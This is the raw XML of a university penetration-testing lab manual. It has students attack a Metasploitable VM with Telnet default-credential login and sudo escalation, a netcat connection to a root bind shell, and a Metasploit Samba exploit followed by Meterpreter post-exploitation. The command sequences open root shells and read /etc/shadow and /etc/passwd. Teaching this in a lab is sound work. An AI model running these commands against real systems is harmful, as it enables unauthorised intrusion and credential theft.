              <w:left w:val="single" w:color="EDE9FE" w:sz="4"/>
              <w:bottom w:val="single" w:color="EDE9FE" w:sz="4"/>
              <w:right w:val="single" w:color="7C3AED" w:sz="4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search rank:excellent results, show options, exploit with session opened message, and whoami/ls output in root shell.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Label: 'Task5-Samba.png'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Screenshots — Task 5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:spacing w:before="120"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486400" cy="535428"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="112" name="Img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g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486400" cy="1838048"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="113" name="Img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g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486400" cy="715617"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="114" name="Img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g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486400" cy="4032504"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="115" name="Img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g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B2A4A" w:sz="6"/>
              <w:left w:val="single" w:color="1B2A4A" w:sz="6"/>
              <w:bottom w:val="single" w:color="1B2A4A" w:sz="6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8160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1B2A4A" w:sz="6"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1B2A4A" w:sz="6"/>
              <w:right w:val="single" w:color="1B2A4A" w:sz="6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before="10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Telnet Access via Default Credentials (Port 23)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="A5B4FC"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">10 Marks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="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Port 23 (Telnet) on Metasploitable is openly accessible with the default msfadmin/msfadmin credentials. While this does not require Metasploit, it demonstrates a critical real-world weakness: default credentials. Many IoT devices, routers, and legacy systems ship with unchanged default passwords.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4"/>
              <w:left w:val="single" w:color="0F766E" w:sz="4"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="0F766E" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="0F766E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Step 1: Connect via Telnet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root@kali:~# telnet 192.168.56.102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Expected: Metasploitable ASCII art banner and 'metasploitable login:'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Step 2: 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metasploitable login: msfadmin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Password: msfadmin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Step 3: Explore the system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msfadmin@metasploitable:~$ whoami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msfadmin@metasploitable:~$ sudo -l        # Check sudo privileges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msfadmin@metasploitable:~$ sudo su -       # Escalate to root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root@metasploitable:~# id                 # Confirm root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root@metasploitable:~# cat /etc/shadow    # View password hashes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single" w:color="0F766E" w:sz="4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root@metasploitable:~# history            # View command history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33.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Connect to Metasploitable via Telnet using msfadmin/msfadmin. Screenshot the banner and successful login.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34.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Run whoami and sudo -l. Record whether msfadmin has sudo privileges.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35.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Escalate to root using sudo su -. Run id to confirm uid=0.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36.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Run cat /etc/shadow and record the first 5 lines (do NOT attempt to crack these for this task — that is Lab 07).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37.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Explain in your lab report why Telnet is considered insecure even when proper credentials are used (hint: think about the transport protocol).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FEF3C7" w:sz="4"/>
              <w:left w:val="single" w:color="B45309" w:sz="12"/>
              <w:bottom w:val="single" w:color="FEF3C7" w:sz="4"/>
              <w:right w:val="single" w:color="FEF3C7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VIVA
QUESTION</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="FEF3C7" w:sz="4"/>
              <w:left w:val="single" w:color="FEF3C7" w:sz="4"/>
              <w:bottom w:val="single" w:color="FEF3C7" w:sz="4"/>
              <w:right w:val="single" w:color="B45309" w:sz="4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Why is Telnet dangerous compared to SSH? What is a default credential attack?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Name 3 real-world devices that are commonly found with default credentials.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DE9FE" w:sz="4"/>
              <w:left w:val="single" w:color="7C3AED" w:sz="12"/>
              <w:bottom w:val="single" w:color="EDE9FE" w:sz="4"/>
              <w:right w:val="single" w:color="EDE9FE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SCREENSHOT
REQUIRED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="EDE9FE" w:sz="4"/>
              <w:left w:val="single" w:color="EDE9FE" w:sz="4"/>
              <w:bottom w:val="single" w:color="EDE9FE" w:sz="4"/>
              <w:right w:val="single" w:color="7C3AED" w:sz="4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Telnet banner, successful msfadmin login, sudo su escalation, and root id output.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Label: 'Task6-Telnet.png'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Screenshots — Task 6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:spacing w:before="120"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486400" cy="847288"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="116" name="Img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g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486400" cy="2041614"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="117" name="Img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g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486400" cy="1784648"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="118" name="Img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g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486400" cy="1614469"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="119" name="Img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g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B2A4A" w:sz="6"/>
              <w:left w:val="single" w:color="1B2A4A" w:sz="6"/>
              <w:bottom w:val="single" w:color="1B2A4A" w:sz="6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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1B2A4A" w:sz="6"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1B2A4A" w:sz="6"/>
              <w:right w:val="single" w:color="1B2A4A" w:sz="6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before="10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Bind Shell — Netcat to Port 1524</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="A5B4FC"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">10 Marks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="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Port 1524 on Metasploitable runs an intentional root bind shell — a listening shell with no authentication required. This demonstrates the concept of a bind shell: the victim machine opens a port, and any attacker who connects receives a root command prompt immediately.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4"/>
              <w:left w:val="single" w:color="0F766E" w:sz="4"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="0F766E" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="0F766E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Step 1: Confirm port 1524 is open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root@kali:~# nmap -sC -sV -p1524 192.168.56.102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Expected: 1524/tcp  open  bindshell  Metasploitable root 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Step 2: Connect directly using Netcat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root@kali:~# nc 192.168.56.102 1524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Step 3: Immediate root shell — no login needed!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root@metasploitable:/# whoami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root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root@metasploitable:/# hostname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metasploitable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root@metasploitable:/#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uid=0(root) gid=0(root) groups=0(root)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root@metasploitable:/# ls /root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root@metasploitable:/# cat /etc/crontab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Step 4: Exit when done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single" w:color="0F766E" w:sz="4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root@metasploitable:/# exit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38.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Scan port 1524 with Nmap -sC -sV. Screenshot the output showing 'bindshell Metasploitable root shell'.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39.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Connect to port 1524 using Netcat. Screenshot the immediate root prompt (no username or password prompt).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40.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Run whoami, id, hostname, and ls /root. Record all outputs.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41.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Run ps aux to list all running processes. Identify and record any suspicious or interesting processes.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42.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Explain in your report: What is a bind shell? How does this differ from the reverse shell used in Task 5? Why is an unauthenticated root bind shell the worst possible security configuration?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FEF3C7" w:sz="4"/>
              <w:left w:val="single" w:color="B45309" w:sz="12"/>
              <w:bottom w:val="single" w:color="FEF3C7" w:sz="4"/>
              <w:right w:val="single" w:color="FEF3C7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VIVA
QUESTION</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="FEF3C7" w:sz="4"/>
              <w:left w:val="single" w:color="FEF3C7" w:sz="4"/>
              <w:bottom w:val="single" w:color="FEF3C7" w:sz="4"/>
              <w:right w:val="single" w:color="B45309" w:sz="4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How is a bind shell different from a reverse shell in terms of who initiates the connection?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Could a real-world attacker exploit port 1524 directly from the internet? Why or why not?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DE9FE" w:sz="4"/>
              <w:left w:val="single" w:color="7C3AED" w:sz="12"/>
              <w:bottom w:val="single" w:color="EDE9FE" w:sz="4"/>
              <w:right w:val="single" w:color="EDE9FE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SCREENSHOT
REQUIRED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="EDE9FE" w:sz="4"/>
              <w:left w:val="single" w:color="EDE9FE" w:sz="4"/>
              <w:bottom w:val="single" w:color="EDE9FE" w:sz="4"/>
              <w:right w:val="single" w:color="7C3AED" w:sz="4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Nmap port 1524 scan, nc connection showing immediate root prompt, and whoami/id/hostname outputs.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Label: 'Task7-BindShell.png'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Screenshots — Task 7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:spacing w:before="120"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486400" cy="1751724"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="120" name="Img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g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486400" cy="1519739"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="121" name="Img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g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486400" cy="2417618"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="122" name="Img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g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B2A4A" w:sz="6"/>
              <w:left w:val="single" w:color="1B2A4A" w:sz="6"/>
              <w:bottom w:val="single" w:color="1B2A4A" w:sz="6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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1B2A4A" w:sz="6"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1B2A4A" w:sz="6"/>
              <w:right w:val="single" w:color="1B2A4A" w:sz="6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top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="10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Meterpreter Post-Exploitation (Extension Task)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="A5B4FC"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">10 Marks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="6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Meterpreter is an advanced in-memory payload that runs entirely in RAM — it never writes to disk, making it harder to detect. It provides a rich post-exploitation interface. In this task, you will use a Meterpreter payload with the Samba exploit from Task 5.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4"/>
              <w:left w:val="single" w:color="0F766E" w:sz="4"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="0F766E" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="0F766E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 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Re-use the Samba exploit but switch to a Meterpreter payload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msf6 &gt; use exploit/multi/samba/usermap_script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msf6 exploit(multi/samba/usermap_script) &gt; set RHOSTS 192.168.56.102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msf6 exploit(multi/samba/usermap_script) &gt; set LHOST eth1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Set Meterpreter payload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msf6 exploit(multi/samba/usermap_script) &gt; set payload cmd/unix/reverse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msf6 exploit(multi/samba/usermap_script) &gt; show payloads   # view all compatible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Run the exploit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msf6 exploit(multi/samba/usermap_script) &gt; exploit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6EFAC"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># In the session — run Meterpreter commands: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meterpreter &gt; sysinfo              # OS, computer name, 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meterpreter &gt; getuid               # Current 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meterpreter &gt; ps                   # Running processes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meterpreter &gt; ls /etc              # List /etc directory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meterpreter &gt; download /etc/passwd /tmp/passwd_copy   # Download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meterpreter &gt; shell                # Drop to system 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meterpreter &gt; background           # Background the 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none" w:color="FFFFFF" w:sz="0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msf6 &gt; sessions                    # List all active sessions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766E" w:sz="4"/>
              <w:bottom w:val="single" w:color="0F766E" w:sz="4"/>
              <w:right w:val="single" w:color="0F766E" w:sz="4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20"/>
            </w:tcMar>
            <w:vAlign w:val="top"/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E2E8F0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">msf6 &gt; sessions -i 1              # Reattach to session 1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43.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Re-launch the Samba exploit and obtain a session. Run sysinfo — screenshot the output showing OS and architecture.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44.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Run ps and identify a process running as root. Record its PID and process name.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45.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Download /etc/passwd to your Kali machine using the download command. Confirm the file was saved.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46.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Use the background command to push the session to background. Run sessions to confirm it is listed.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47.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Re-attach to the session using sessions -i 1 and run getuid to confirm you still have root access.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FEF3C7" w:sz="4"/>
              <w:left w:val="single" w:color="B45309" w:sz="12"/>
              <w:bottom w:val="single" w:color="FEF3C7" w:sz="4"/>
              <w:right w:val="single" w:color="FEF3C7" w:sz="4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VIVA
QUESTION</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="FEF3C7" w:sz="4"/>
              <w:left w:val="single" w:color="FEF3C7" w:sz="4"/>
              <w:bottom w:val="single" w:color="FEF3C7" w:sz="4"/>
              <w:right w:val="single" w:color="B45309" w:sz="4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Why is Meterpreter harder to detect than a standard reverse shell? What does 'in-memory payload' mean?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What is the difference between 'background' and 'exit' in a Meterpreter session?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DE9FE" w:sz="4"/>
              <w:left w:val="single" w:color="7C3AED" w:sz="12"/>
              <w:bottom w:val="single" w:color="EDE9FE" w:sz="4"/>
              <w:right w:val="single" w:color="EDE9FE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SCREENSHOT
REQUIRED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="EDE9FE" w:sz="4"/>
              <w:left w:val="single" w:color="EDE9FE" w:sz="4"/>
              <w:bottom w:val="single" w:color="EDE9FE" w:sz="4"/>
              <w:right w:val="single" w:color="7C3AED" w:sz="4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Meterpreter sysinfo output, ps listing, download command success, and sessions list showing backgrounded session.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Label: 'Task8-Meterpreter.png'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Screenshots — Task 8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:spacing w:before="120"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486400" cy="3489434"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="123" name="Img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g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486400" cy="747787"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="124" name="Img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g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120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5486400" cy="2837312"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="125" name="Img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g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spacing w:before="0" w:after="0"/>
    </w:pPr>
  </w:p>
  <w:tbl>
    <w:tblPr>
      <w:tblW w:type="dxa" w:w="10224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112"/>
      <w:gridCol w:w="5112"/>
    </w:tblGrid>
    <w:tr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:type="dxa" w:w="511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  <w:vAlign w:val="top"/>
        </w:tcPr>
        <w:p>
          <w:pPr>
            <w:spacing w:before="40" w:after="0"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              <w:color w:val="9CA3AF"/>
              <w:sz w:val="16"/>
              <w:szCs w:val="16"/>
            </w:rPr>
            <w:t xml:space="preserve">Air University  |  Penetration Testing Lab Manual</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:type="dxa" w:w="511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  <w:vAlign w:val="top"/>
        </w:tcPr>
        <w:p>
          <w:pPr>
            <w:spacing w:before="40" w:after="0"/>
            <w:jc w:val="right"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              <w:color w:val="9CA3AF"/>
              <w:sz w:val="16"/>
              <w:szCs w:val="16"/>
            </w:rPr>
            <w:t xml:space="preserve">Lab 05  |  Page </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              <w:color w:val="9CA3AF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24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3724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  <w:vAlign w:val="top"/>
        </w:tcPr>
        <w:p>
          <w:pPr>
            <w:spacing w:before="0" w:after="0"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              <w:color w:val="6B7280"/>
              <w:sz w:val="16"/>
              <w:szCs w:val="16"/>
            </w:rPr>
            <w:t xml:space="preserve">Air University, Islamabad  |  Dept. of Cyber Security</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:type="dxa" w:w="3724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  <w:vAlign w:val="top"/>
        </w:tcPr>
        <w:p>
          <w:pPr>
            <w:spacing w:before="0" w:after="0"/>
            <w:jc w:val="right"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              <w:color w:val="6B7280"/>
              <w:sz w:val="16"/>
              <w:szCs w:val="16"/>
            </w:rPr>
            <w:t xml:space="preserve">Penetration Testing Lab  |  Lab 05</w:t>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:color="2563EB" w:sz="6" w:space="1"/>
      </w:pBdr>
      <w:spacing w:before="4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2026-03-31T09:52:10.059Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-31T09:52:10.059Z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